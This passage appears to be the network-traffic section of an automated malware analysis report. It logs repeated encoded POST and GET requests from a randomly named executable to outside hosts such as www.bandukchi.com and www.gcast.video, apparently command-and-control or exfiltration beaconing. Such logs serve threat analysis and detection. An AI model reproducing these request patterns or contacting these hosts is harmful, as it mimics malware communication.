                                                                                Data Raw: 59 38 69 3d 51 7a 6a 69 7a 77 41 5a 79 4d 51 53 35 68 33 41 6e 36 56 42 4a 38 44 44 4d 74 41 78 4f 53 6d 4f 6b 63 68 65 2f 48 57 77 41 31 47 53 74 38 44 69 59 51 4d 76 39 42 75 69 7a 5a 62 75 4c 33 2b 41 4e 5a 71 50 4f 6f 57 71 4d 6f 44 57 74 47 35 54 59 6a 6a 41 56 6a 75 71 2b 4e 53 6f 74 57 37 6c 37 62 69 75 41 38 56 45 74 4c 70 6f 58 79 4f 2b 49 49 7a 64 73 6b 65 32 31 73 4e 49 42 2b 55 34 37 4c 79 50 51 6d 7a 78 6c 31 79 4e 48 31 51 43 31 70 30 76 54 7a 41 67 79 71 30 31 56 56 6c 4a 52 62 77 78 5a 59 59 6f 43 38 4c 54 4d 72 47 57 4d 59 6c 59 51 4e 41 4a 44 4a 2f 59 51 43 62 6e 58 67 3d 3d
                                                                                Data Ascii: Y8i=QzjizwAZyMQS5h3An6VBJ8DDMtAxOSmOkche/HWwA1GSt8DiYQMv9BuizZbuL3+ANZqPOoWqMoDWtG5TYjjAVjuq+NSotW7l7biuA8VEtLpoXyO+IIzdske21sNIB+U47LyPQmzxl1yNH1QC1p0vTzAgyq01VVlJRbwxZYYoC8LTMrGWMYlYQNAJDJ/YQCbnXg==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.4500223.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:01.009502888 CET783OUTPOST /d22y/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bandukchi.com
                                                                                Origin: http://www.bandukchi.com
                                                                                Referer: http://www.bandukchi.com/d22y/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 51 7a 6a 69 7a 77 41 5a 79 4d 51 53 37 41 48 41 30 4c 56 42 50 63 44 41 4a 74 41 78 42 79 6d 4b 6b 63 39 65 2f 47 43 61 44 44 2b 53 74 5a 6e 69 62 55 59 76 38 42 75 69 68 35 62 6e 46 58 2b 31 4e 5a 6d 39 4f 71 53 71 4d 6f 58 57 74 47 70 54 66 53 6a 48 56 7a 75 6f 78 74 53 51 77 6d 37 6c 37 62 69 75 41 38 41 4d 74 4c 42 6f 58 44 65 2b 48 4a 7a 65 6d 45 65 31 32 73 4e 49 58 4f 55 38 37 4c 79 74 51 6e 75 63 6c 33 4b 4e 48 33 59 43 31 36 73 73 4a 6a 41 6d 32 71 31 57 62 56 6b 78 62 35 42 41 52 4c 73 63 49 6f 62 4c 41 4e 58 4d 64 70 45 50 43 4e 6b 36 65 4f 32 73 64 42 6d 75 4d 6c 32 74 72 47 50 4f 4b 37 73 57 4a 72 4d 71 45 46 6c 44 64 5a 73 3d
                                                                                Data Ascii: Y8i=QzjizwAZyMQS7AHA0LVBPcDAJtAxBymKkc9e/GCaDD+StZnibUYv8Buih5bnFX+1NZm9OqSqMoXWtGpTfSjHVzuoxtSQwm7l7biuA8AMtLBoXDe+HJzemEe12sNIXOU87LytQnucl3KNH3YC16ssJjAm2q1WbVkxb5BARLscIobLANXMdpEPCNk6eO2sdBmuMl2trGPOK7sWJrMqEFlDdZs=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.4500233.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:03.548578978 CET10865OUTPOST /d22y/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bandukchi.com
                                                                                Origin: http://www.bandukchi.com
                                                                                Referer: http://www.bandukchi.com/d22y/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 51 7a 6a 69 7a 77 41 5a 79 4d 51 53 37 41 48 41 30 4c 56 42 50 63 44 41 4a 74 41 78 42 79 6d 4b 6b 63 39 65 2f 47 43 61 44 41 65 53 74 76 72 69 5a 7a 30 76 36 78 75 69 36 35 62 69 46 58 2b 53 4e 5a 2b 35 4f 71 66 52 4d 74 54 57 76 67 6c 54 65 67 62 48 62 7a 75 6f 70 74 53 72 74 57 37 30 37 62 53 71 41 38 51 4d 74 4c 42 6f 58 42 32 2b 4f 34 7a 65 67 45 65 32 31 73 4e 4d 42 2b 56 5a 37 50 65 58 51 6e 72 68 6c 48 71 4e 48 55 77 43 7a 49 30 73 52 7a 41 6b 34 4b 31 77 62 56 6f 75 62 35 4d 2f 52 4c 70 4a 49 76 72 4c 51 71 36 54 49 4b 31 53 42 4d 41 43 64 38 33 4d 5a 68 79 72 41 6b 75 36 71 57 76 7a 5a 71 6f 4b 54 71 68 61 58 31 68 61 4f 65 74 55 6c 34 45 37 35 62 2f 6a 4f 6d 42 51 69 66 66 32 74 65 6d 6c 74 36 4a 56 74 2b 73 48 75 33 53 6f 5a 66 77 38 5a 6a 4d 53 32 4f 43 4c 31 58 41 4e 6f 54 31 75 36 38 52 47 43 69 57 47 71 78 7a 31 39 61 48 77 37 47 43 2b 62 74 55 4b 6b 75 44 61 45 57 77 39 50 4e 68 78 58 70 6f 72 71 71 64 4d 46 39 59 39 77 64 67 5a 69 2f 74 47 39 6d 69 57 79 42 6c 53 57 55 [TRUNCATED]
                                                                                Data Ascii: Y8i=QzjizwAZyMQS7AHA0LVBPcDAJtAxBymKkc9e/GCaDAeStvriZz0v6xui65biFX+SNZ+5OqfRMtTWvglTegbHbzuoptSrtW707bSqA8QMtLBoXB2+O4zegEe21sNMB+VZ7PeXQnrhlHqNHUwCzI0sRzAk4K1wbVoub5M/RLpJIvrLQq6TIK1SBMACd83MZhyrAku6qWvzZqoKTqhaX1haOetUl4E75b/jOmBQiff2temlt6JVt+sHu3SoZfw8ZjMS2OCL1XANoT1u68RGCiWGqxz19aHw7GC+btUKkuDaEWw9PNhxXporqqdMF9Y9wdgZi/tG9miWyBlSWU2pR3N5fwtHLcTm6DhaaZf1Ojqc0gQqOjL3h839Bf5Rdzt1DuQ9tHHPaRlF+bKU2cBY1dib7QO/hwG6vdNZrJ+q5U2ckYwUfD5JOIW9HqKF28/McQQbDd+BYWBpMDUXfUUmhRu9vtxnbyq4Js1neGjvswKPkITQ78+Zvz3oa0C79/iJ0B4oQDE6xihoeFyH4a//q4u5ND2Ec6onFyOCpKV8xzMS8EKBzyQEsdvfz1954ifuxGJtj1ks4kXa+nlTFRbPLEfTXFvmnxLvu1/1Kk1gOR5uLhZ+ZUI/h4JHlqZ90u3w1YdTpImMwIwW4pKETjnNOYAsLSLyW9WqD7fHETChAF+vMa7NLiJydkbUXPSDmK+Tc8N/sKyh/5j4jnT9cLd13/OHk/M2/vhVABsPOIXhzh0m26i7HjHYZaDYWZWWOSQhhdRicPo8NY9shcR2Ipks/B1LVr2aTPirlv8AKuF70RBk3rX2C40Wy4JrbJmatWKwIFH4QuOiK7dHGihNILaZWmzEkkV4YlYqlg+llSGI+6P1211HxqPKIN1vOEwzJ7Myoo8ei+WBRok8V8MCWSM028CcWc/oXyVB9kInP9SJtHQPW5SS9ryKFHYlpZt1xL96cqgnEoSbOg59UU6GN596zSjsy5aJCgM6vSP3BM5GxYDyjAyR0qZm [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.4500243.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:06.094369888 CET502OUTGET /d22y/?Y8i=dxLCwHEd799e6zKzvZNVLcz/EcQwMQKXxfRDzHSBACKu35rXWSMWvF6m2/zFPWSnOOS4JYjJIrjoqVx5R3nGQB+J6unEzU7Qg/zyG7VApaoWeyOXFK3Agjg=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.bandukchi.com
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:37:06.717147112 CET400INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:37:06 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 38 69 3d 64 78 4c 43 77 48 45 64 37 39 39 65 36 7a 4b 7a 76 5a 4e 56 4c 63 7a 2f 45 63 51 77 4d 51 4b 58 78 66 52 44 7a 48 53 42 41 43 4b 75 33 35 72 58 57 53 4d 57 76 46 36 6d 32 2f 7a 46 50 57 53 6e 4f 4f 53 34 4a 59 6a 4a 49 72 6a 6f 71 56 78 35 52 33 6e 47 51 42 2b 4a 36 75 6e 45 7a 55 37 51 67 2f 7a 79 47 37 56 41 70 61 6f 57 65 79 4f 58 46 4b 33 41 67 6a 67 3d 26 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Y8i=dxLCwHEd799e6zKzvZNVLcz/EcQwMQKXxfRDzHSBACKu35rXWSMWvF6m2/zFPWSnOOS4JYjJIrjoqVx5R3nGQB+J6unEzU7Qg/zyG7VApaoWeyOXFK3Agjg=&gvyXe=EtxTw6OpYVppMB"}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.45002598.124.224.17803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:11.980007887 CET757OUTPOST /9kvp/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.gcast.video
                                                                                Origin: http://www.gcast.video
                                                                                Referer: http://www.gcast.video/9kvp/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 76 70 74 4f 4b 52 55 55 2f 50 2b 2f 30 6a 52 46 42 76 6f 36 70 4f 6f 73 71 74 43 67 47 31 61 57 64 54 31 4b 42 72 6d 35 74 41 42 30 6e 46 42 68 41 74 4a 32 66 31 55 31 78 4f 66 43 42 49 47 72 6a 41 2f 79 75 78 72 4c 42 53 4e 67 69 74 70 37 64 70 67 68 6c 4d 44 54 50 68 4b 2b 35 79 78 41 68 55 37 48 63 33 34 6e 6d 36 63 75 35 56 6b 57 35 5a 72 4a 58 76 38 4a 4e 57 33 6b 6b 6f 72 69 6c 2f 51 65 53 6a 38 66 31 33 78 6b 62 78 47 2f 36 34 55 41 53 35 75 49 4b 33 34 61 63 4d 77 32 32 49 46 31 4c 6f 70 62 65 48 30 61 79 6d 44 71 2b 63 37 64 2f 59 58 51 72 4b 5a 37 59 66 4d 79 6f 77 3d 3d
                                                                                Data Ascii: Y8i=vptOKRUU/P+/0jRFBvo6pOosqtCgG1aWdT1KBrm5tAB0nFBhAtJ2f1U1xOfCBIGrjA/yuxrLBSNgitp7dpghlMDTPhK+5yxAhU7Hc34nm6cu5VkW5ZrJXv8JNW3kkoril/QeSj8f13xkbxG/64UAS5uIK34acMw22IF1LopbeH0aymDq+c7d/YXQrKZ7YfMyow==
                                                                                Nov 17, 2024 08:37:12.617120028 CET1236INHTTP/1.1 404 Not Found
                                                                                Content-Type: text/html
                                                                                Server: Microsoft-IIS/10.0
                                                                                X-Powered-By: ASP.NET
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Date: Sun, 17 Nov 2024 07:37:12 GMT
                                                                                Connection: close
                                                                                Content-Length: 1245
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                Nov 17, 2024 08:37:12.618607044 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                                Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.45002698.124.224.17803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:14.518320084 CET777OUTPOST /9kvp/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.gcast.video
                                                                                Origin: http://www.gcast.video
                                                                                Referer: http://www.gcast.video/9kvp/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 76 70 74 4f 4b 52 55 55 2f 50 2b 2f 31 41 4a 46 53 49 63 36 75 75 6f 72 32 39 43 67 51 46 61 4e 64 53 4a 4b 42 75 4c 38 74 79 6c 30 6d 6e 5a 68 42 6f 31 32 59 31 55 31 6c 2b 66 44 63 59 47 69 6a 41 43 50 75 77 58 4c 42 53 5a 67 69 73 5a 37 49 4f 55 69 6d 38 44 72 4a 68 4b 38 32 53 78 41 68 55 37 48 63 33 39 43 6d 36 45 75 2b 6c 55 57 34 39 33 49 5a 50 38 49 4b 57 33 6b 7a 34 72 2b 6c 2f 51 34 53 6d 63 35 31 30 5a 6b 62 30 69 2f 36 74 30 66 59 35 75 43 41 58 35 4c 5a 4e 74 61 77 49 77 37 47 62 78 31 5a 6d 46 6e 7a 67 53 77 76 74 61 4b 74 59 7a 6a 32 4e 51 50 56 63 78 37 7a 31 58 48 56 63 35 52 6b 33 6f 4c 44 4c 30 4c 59 63 34 4f 74 6b 59 3d
                                                                                Data Ascii: Y8i=vptOKRUU/P+/1AJFSIc6uuor29CgQFaNdSJKBuL8tyl0mnZhBo12Y1U1l+fDcYGijACPuwXLBSZgisZ7IOUim8DrJhK82SxAhU7Hc39Cm6Eu+lUW493IZP8IKW3kz4r+l/Q4Smc510Zkb0i/6t0fY5uCAX5LZNtawIw7Gbx1ZmFnzgSwvtaKtYzj2NQPVcx7z1XHVc5Rk3oLDL0LYc4OtkY=
                                                                                Nov 17, 2024 08:37:15.152802944 CET1236INHTTP/1.1 404 Not Found
                                                                                Content-Type: text/html
                                                                                Server: Microsoft-IIS/10.0
                                                                                X-Powered-By: ASP.NET
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Date: Sun, 17 Nov 2024 07:37:14 GMT
                                                                                Connection: close
                                                                                Content-Length: 1245
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                Nov 17, 2024 08:37:15.152828932 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                                Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.45002798.124.224.17803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:17.066808939 CET10859OUTPOST /9kvp/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.gcast.video
                                                                                Origin: http://www.gcast.video
                                                                                Referer: http://www.gcast.video/9kvp/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 76 70 74 4f 4b 52 55 55 2f 50 2b 2f 31 41 4a 46 53 49 63 36 75 75 6f 72 32 39 43 67 51 46 61 4e 64 53 4a 4b 42 75 4c 38 74 79 74 30 6d 53 46 68 42 50 68 32 5a 31 55 31 6d 2b 66 65 63 59 48 79 6a 41 71 44 75 77 62 62 42 52 68 67 67 4b 6c 37 4d 4d 38 69 78 73 44 72 46 42 4b 2f 35 79 78 56 68 55 4c 44 63 33 4e 43 6d 36 45 75 2b 6a 77 57 2f 70 72 49 62 50 38 4a 4e 57 33 6f 6b 6f 72 61 6c 2f 4a 4e 53 6d 6f 50 31 46 35 6b 62 55 53 2f 37 5a 55 66 55 35 75 45 48 58 35 54 5a 4e 68 46 77 49 73 42 47 59 74 66 5a 6d 78 6e 33 30 54 4d 34 5a 53 41 7a 5a 76 63 74 2f 51 32 65 63 42 5a 77 6e 75 39 61 4e 74 73 36 46 63 57 4d 49 70 41 46 75 67 74 7a 54 30 4c 46 6f 43 43 6b 78 49 6b 69 4b 34 54 5a 46 77 6d 32 79 78 43 31 4d 41 46 75 73 56 2f 4a 4b 6e 51 72 68 34 2f 38 39 6e 49 39 47 76 35 77 69 47 50 46 4e 2f 47 56 4b 43 57 44 2b 56 79 79 72 65 7a 51 52 61 62 59 57 6d 73 71 78 35 63 33 53 45 54 30 66 31 53 31 36 65 78 72 77 73 57 67 4a 6d 57 42 66 67 66 37 57 4c 4c 5a 76 47 61 4b 72 46 69 43 78 4e 2f 47 30 [TRUNCATED]
                                                                                Data Ascii: Y8i=vptOKRUU/P+/1AJFSIc6uuor29CgQFaNdSJKBuL8tyt0mSFhBPh2Z1U1m+fecYHyjAqDuwbbBRhggKl7MM8ixsDrFBK/5yxVhULDc3NCm6Eu+jwW/prIbP8JNW3okoral/JNSmoP1F5kbUS/7ZUfU5uEHX5TZNhFwIsBGYtfZmxn30TM4ZSAzZvct/Q2ecBZwnu9aNts6FcWMIpAFugtzT0LFoCCkxIkiK4TZFwm2yxC1MAFusV/JKnQrh4/89nI9Gv5wiGPFN/GVKCWD+VyyrezQRabYWmsqx5c3SET0f1S16exrwsWgJmWBfgf7WLLZvGaKrFiCxN/G0Bp1aqk6kkbshAQyQHdJYBWCqw0egBs/ESPA0EM+lJQWlyHrIB1L9XvoTiAfNheZEMQnroDmzhHwPMvtxJzDS/EjFMJT0jKTwM09/qJPlfG4OUhsTMV8qGm9m2Q4sYKVV58fBor9YzDD50xNTpg8SMUwYccxtDaEtUW6HbXd9UGb52zDFGIIO66CMKxFAzwmGS48DcTaf09ykN15fZaymVtlNuSAnAC1OzlyG/mtmx0js8om+TzNMlBnZXl02b8TRcRX0sdfBIz8FCsSJc1j8FZ0wyHpybwi6/Ds8VE/pPGxn+wTJ95c30F+aKXjgZIbXs1w2ZQd5w+pkpr04f3+VCEhHzUxwCfjHK6VUsqlb60wsSM7zN74NOwQIkCEMDTUBp7y52bpfH6Fb8MoxfbiT90ByrJMEmXpYhTtE+eeXSR5cLpLlM3921GHq6iXRAGNfh9gpXxi1UuE6hF5V/t0v7WOZqI8eAukW0DRd9GE+48KPl0YfAiiYKOwX74j4xHYcvokDeydF8r4YgVwnwr4slkXLK0Gycz68dfqV3F1HqX40wQDhjGX5GqemI7XcAtPZSE1oIaN58wH0RGCHALajVnUVrlpjkvtWoaIbeXW0EOd1PUJHwR3roVKzjKd4kqjuZxCs71zRiRkXKbMFpx/qV2rhPkVYx/YZaW [TRUNCATED]
                                                                                Nov 17, 2024 08:37:17.703530073 CET1236INHTTP/1.1 404 Not Found
                                                                                Content-Type: text/html
                                                                                Server: Microsoft-IIS/10.0
                                                                                X-Powered-By: ASP.NET
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Date: Sun, 17 Nov 2024 07:37:17 GMT
                                                                                Connection: close
                                                                                Content-Length: 1245
